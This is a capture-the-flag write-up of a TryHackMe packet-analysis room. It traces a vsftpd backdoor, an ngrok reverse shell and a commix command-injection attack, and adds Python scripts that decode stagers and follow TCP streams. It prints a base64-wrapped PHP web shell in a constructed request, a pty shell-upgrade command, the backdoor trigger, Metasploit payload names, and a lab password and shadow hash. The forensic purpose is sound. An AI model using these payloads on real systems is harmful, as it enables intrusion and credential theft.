TryHackMe: Pcap Analysis

Baran Akın
6 min read · Jun 6, 2022

Write-up of the Pcap Analysis room created by Anıl Yelken on TryHackMe

Hello everyone! In this article I describe the solution to the Pcap Analysis room provided by Kale İleri Teknoloji. We answer the questions by analysing the pcap file provided for each task.

[Task 1]

First, we open the file named pcap.pcapng in Wireshark and apply the following display filter to find the banner on port 21.

tcp.port == 21

We see that an FTP service is running on port 21, and the server's 220 greeting gives its banner as vsFTPd 2.3.4.

Next, to find the NSE script the question asks for, we grep the Nmap scripts directory on Kali Linux for the smiley-face username that triggers the backdoor (-s silences errors, -l prints only the matching file names).

find /usr/share/nmap/scripts -iname '*.nse' | xargs grep 'USER X:)' -sl

The script we are after is ftp-vsftpd-backdoor.nse.

For the third question we need to read the script's code, which is available on GitHub.

https://github.com/nmap/nmap/blob/master/scripts/ftp-vsftpd-backdoor.nse

Reading it, we see that the script connects to the backdoor shell and runs the id command (the default value of its ftp-vsftpd-backdoor.cmd script argument).

For the next question we start the Metasploit Framework and search for a module matching the banner with the following command.

search vsftpd

The exploit used is exploit/unix/ftp/vsftpd_234_backdoor.

Segments that carry application data are normally sent with the PSH and ACK flags set, so inspecting their contents shows which commands were run (the flags are a heuristic, not a guarantee: a large write may be split so that only its last segment carries PSH). To find the first command issued after the backdoor was opened, we filter on those flags. The vsftpd 2.3.4 backdoor listens on TCP port 6200, so the shell traffic can be narrowed further by port if the capture is noisy.

tcp.flags.ack==1 and tcp.flags.push==1

In packet 209, whoami is the first command executed over the backdoor connection.

If we right-click packet 209 and choose “Follow” -> “TCP Stream”, we can see the full sequence of commands and their output in the TCP stream.

For the remaining questions of this task, the ID of the kaleileriteknoloji user is 1003 and the user.txt file contains 10031003.

[Task 2]

For the second task we open pcap2.pcapng in Wireshark.

We start with the DNS A-record traffic, using the following filter (it matches DNS packets that carry an A record).

dns.a

Here the domain name tunnel.us.ngrok.com resolves to 3.134.73.173, so the reverse shell is delivered through an ngrok tunnel. The shell data again travels in packets with PSH and ACK set, and because the local ngrok client hands the tunnelled connection to a listener on the same host, the packets we care about have loopback source and destination addresses. The following filter isolates them.

tcp.flags.ack==1 and tcp.flags.push==1 and ip.src==127.0.0.1 and ip.dst==127.0.0.1

We can see that the reverse shell was received on port 4444 through ngrok.

If we right-click packet 526 and choose “Follow” -> “TCP Stream”, we can see the commands that were executed.

We can see that the second command executed is whoami.

[Task 3]

Finally, for the third task we download pcap3.pcapng and open it in Wireshark.

To begin, we filter for HTTP POST requests and look at which commands were executed and what they returned. The following filter does this.

http.request.method == POST

Going through the matching packets, the last one deserves a closer look.

In packet 1196 we see that the payload reaches out to port 1234 on 10.10.10.128, and that the exploited vulnerability is command injection. The User-Agent header identifies the tool used as commix.

For the fourth question, reviewing the same filtered packets one by one, the script in packet 871 stands out.

eval is used to execute the base64-decoded data sent in the web request.

For the next question we search the Metasploit Framework for the payload. The following search query finds it.

search php payload meterpreter

Here php/meterpreter/reverse_tcp is the payload that immediately stands out.

To see the commands that were sent, we again look at packets with the PSH and ACK flags set, using the following filter.

tcp.flags.ack==1 and tcp.flags.push==1

Following the TCP stream from packet 887 reveals the dropped PHP code.

As can be seen, shell_exec runs whatever is supplied in the cmd parameter.
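The eval(base64_decode(...)) stager in packet 871 and the shell_exec web shell in packet 887 can be recovered from the POST body without clicking through packets one by one. The script below is an added example written for this write-up; it is not code from the room, from Wireshark or from commix. The request, the host address, the User-Agent string and the PHP stager in it are constructed, and the eval(base64_decode('...')) shape is the generic PHP pattern rather than the room's exact bytes.

```python
"""Recover what a command-injection POST actually runs: the injected command and the
PHP that eval(base64_decode(...)) executes.

Added illustration for this write-up, not code from the room or from commix. The
request and the stager below are constructed; the eval(base64_decode('...')) shape is
the generic PHP pattern, not the room's exact bytes.
"""
import base64
import re
from urllib.parse import parse_qs, quote_plus

EVAL_B64 = re.compile(r"eval\s*\(\s*base64_decode\s*\(\s*['\"]?([A-Za-z0-9+/=_-]+)['\"]?\s*\)\s*\)")
SHELL_SPLIT = re.compile(r"\s*(?:;|&&|\|\||\||\n)\s*")  # metacharacters an injection rides on


def parse_http_request(raw):
    """Split a raw HTTP/1.x request into (method, path, headers, body); header names lower-cased."""
    head, _, body = raw.partition(b"\r\n\r\n")
    request_line, *header_lines = head.decode("latin-1").split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body.decode("latin-1")


def injected_commands(body):
    """Per form field: the part after the first shell metacharacter, i.e. what was injected.
    parse_qs percent-decodes, so a base64 blob sent as %2B/%2F survives; a raw '+' would not."""
    injected = {}
    for field, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            legit_and_rest = SHELL_SPLIT.split(value, maxsplit=1)
            if len(legit_and_rest) == 2:
                injected[field] = legit_and_rest[1]
    return injected


def decode_eval_payloads(text):
    """Decode every base64 blob handed to eval(base64_decode(...)), tolerating urlsafe/unpadded input."""
    out = []
    for blob in EVAL_B64.findall(text):
        blob = blob.replace("-", "+").replace("_", "/")
        blob += "=" * (-len(blob) % 4)
        out.append(base64.b64decode(blob).decode("utf-8", errors="replace"))
    return out


def analyse_request(raw):
    """Everything an analyst wants from one captured request, in one dict."""
    method, path, headers, body = parse_http_request(raw)
    injected = injected_commands(body)
    return {
        "method": method,
        "path": path,
        "user_agent": headers.get("user-agent", ""),
        "injected": injected,
        "decoded": [php for cmd in injected.values() for php in decode_eval_payloads(cmd)],
    }


# Constructed sample: a ping form abused to run php -r with a base64-wrapped one-line web shell.
STAGER = 'echo shell_exec($_REQUEST["cmd"]);'   # stand-in for the dropped PHP, not the room's
STAGER_B64 = base64.b64encode(STAGER.encode()).decode()
SAMPLE_REQUEST = (
    "POST /ping.php HTTP/1.1\r\n"
    "Host: 10.10.10.130\r\n"
    "User-Agent: commix/v3.x-stable (constructed sample)\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "addr=" + quote_plus("127.0.0.1;php -r \"eval(base64_decode('" + STAGER_B64 + "'));\"")
).encode()

if __name__ == "__main__":
    for key, value in analyse_request(SAMPLE_REQUEST).items():
        print(f"{key:10}: {value}")
```

The split on shell metacharacters is deliberately greedy on the first separator only: the injected command itself contains semicolons inside the PHP, and splitting again would cut the eval in half. Padding and urlsafe repair in decode_eval_payloads matter in practice because tools often strip the trailing = from base64 to dodge naive filters.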

To answer the remaining questions we reuse the PSH/ACK filter and add a condition restricting the TCP port to 1234.

This yields a long stream. To view it, right-click packet 1206 and choose “Follow” -> “TCP Stream”.

As can be seen, the first command executed was id, and python -c "import pty;pty.spawn('/bin/bash')" was then used to upgrade to an interactive shell.
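The PSH/ACK filter and “Follow” -> “TCP Stream” carry all three tasks (packet 209 in Task 1, packet 526 in Task 2 and packet 1206 here). The script below is an added example written for this write-up, not Wireshark code and not part of the room: a minimal libpcap reader for Ethernet/IPv4/TCP that applies the same filter, rebuilds the stream, and adds the one step the GUI leaves to the eye, selecting commands by who sent them. The capture it reads is constructed in memory; the addresses 10.10.10.128 and 10.10.10.130, the ports and the shell output are stand-ins, not bytes from the room's pcap files.

```python
"""Follow a TCP stream from a capture and pull out the commands carried in PSH/ACK segments.

Added illustration for this write-up (not Wireshark code and not part of the room):
a minimal libpcap reader for Ethernet/IPv4/TCP plus the two filters the tasks use.
The capture is constructed in memory so the script runs offline; addresses, ports and
payloads are made-up stand-ins for the room's pcaps.
"""
import struct

PSH, ACK, SYN = 0x08, 0x10, 0x02
ATTACKER, TARGET = "10.10.10.128", "10.10.10.130"  # constructed addresses


def _ip(addr):
    return bytes(int(octet) for octet in addr.split("."))


def build_frame(src, sport, dst, dport, flags, payload):
    """Ethernet + IPv4 + TCP frame. Checksums are left at zero (Wireshark would flag them)."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, flags, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0, _ip(src), _ip(dst))
    return b"\x00" * 12 + b"\x08\x00" + ip + tcp


def build_pcap(frames):
    """libpcap file: 24-byte global header (magic, v2.4, linktype 1 = Ethernet), then one record per frame."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", i, 0, len(frame), len(frame)) + frame
    return out


def parse_pcap(data):
    """Return one dict per TCP-over-IPv4 frame: src, sport, dst, dport, flags, payload."""
    magic, = struct.unpack_from("<I", data, 0)
    endian = "<" if magic == 0xA1B2C3D4 else ">"  # byte order of the record headers
    off, pkts = 24, []
    while off + 16 <= len(data):
        caplen = struct.unpack_from(endian + "IIII", data, off)[2]
        frame = data[off + 16: off + 16 + caplen]
        off += 16 + caplen
        if len(frame) < 34 or frame[12:14] != b"\x08\x00" or frame[14 + 9] != 6:
            continue  # IPv4 carrying TCP only
        ihl = (frame[14] & 0x0F) * 4
        ip_len = struct.unpack_from("!H", frame, 14 + 2)[0]
        t = 14 + ihl  # start of the TCP header
        sport, dport = struct.unpack_from("!HH", frame, t)
        doff = (frame[t + 12] >> 4) * 4
        pkts.append({"src": ".".join(map(str, frame[14 + 12: 14 + 16])),
                     "dst": ".".join(map(str, frame[14 + 16: 14 + 20])),
                     "sport": sport, "dport": dport, "flags": frame[t + 13],
                     "payload": frame[t + doff: 14 + ip_len]})
    return pkts


def ftp_banner(pkts):
    """First data the server sends on port 21: what `tcp.port == 21` shows at the top of the list."""
    for p in pkts:
        if p["sport"] == 21 and p["payload"]:
            return p["payload"].decode(errors="replace").strip()
    return None


def data_segments(pkts, port):
    """`tcp.port == port and tcp.flags.push == 1 and tcp.flags.ack == 1`, minus empty segments."""
    return [p for p in pkts if port in (p["sport"], p["dport"])
            and (p["flags"] & (PSH | ACK)) == (PSH | ACK) and p["payload"]]


def follow_stream(pkts, port):
    """Roughly what Follow -> TCP Stream shows: both directions, concatenated in capture order."""
    return b"".join(p["payload"] for p in data_segments(pkts, port))


def commands(pkts, port, sender_ip):
    """Lines typed by sender_ip. For the vsftpd backdoor the attacker connects *to* the shell
    port; for a reverse shell the attacker *listens* on it, so select on who sent the bytes
    rather than on which end owns the port."""
    return [p["payload"].decode(errors="replace").strip()
            for p in data_segments(pkts, port) if p["src"] == sender_ip]


# Constructed capture: an FTP greeting on port 21 and a reverse shell to the attacker's port 1234.
SAMPLE = build_pcap([
    build_frame(TARGET, 21, ATTACKER, 40000, PSH | ACK, b"220 (vsFTPd 2.3.4)\r\n"),
    build_frame(TARGET, 45678, ATTACKER, 1234, SYN, b""),        # handshake carries no data,
    build_frame(ATTACKER, 1234, TARGET, 45678, SYN | ACK, b""),  # so data_segments()
    build_frame(TARGET, 45678, ATTACKER, 1234, ACK, b""),        # drops these three
    build_frame(ATTACKER, 1234, TARGET, 45678, PSH | ACK, b"id\n"),
    build_frame(TARGET, 45678, ATTACKER, 1234, PSH | ACK, b"uid=33(www-data) gid=33(www-data) groups=33(www-data)\n"),
    build_frame(ATTACKER, 1234, TARGET, 45678, PSH | ACK, b"python -c \"import pty;pty.spawn('/bin/bash')\"\n"),
    build_frame(TARGET, 45678, ATTACKER, 1234, PSH | ACK, b"www-data@target:/var/www/html$ "),
])

if __name__ == "__main__":
    pkts = parse_pcap(SAMPLE)
    print("banner:", ftp_banner(pkts))
    print("typed :", commands(pkts, 1234, ATTACKER))
    print(follow_stream(pkts, 1234).decode(errors="replace"))
```

The room's files are pcapng, which this reader does not parse; convert first with editcap -F pcap in.pcapng out.pcap and pass the bytes to parse_pcap. The sender filter is the point to keep in mind when moving between tasks: on port 6200 the attacker is the client, on port 1234 the attacker is the listener, and in Task 2 both ends are 127.0.0.1 so only the port tells the directions apart.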

Further down the stream, we find that the credential file's full path is /home/siber/cred.txt; it names the siber user and gives that user's password as 12345. sudo su is then used to escalate privileges.

At the very end of the TCP stream, the output of the cat /etc/shadow command contains the hash of the siber user's password.

As you can see, the hash of the siber user’s password is $6$EELzOgDE$YhAb47Tf5EC7lI/GIT2hMUR6zrEk3RaTjfz2ZH3a2qCRHBmpo4n.0BuOZuAZvChyrFVS2YgyBZozTbeT1V1Fz.

Thanks to Anıl Yelken and Kale İleri Teknoloji for this room. I am waiting for your comments and feedback. Thanks for reading. Happy Hacks!
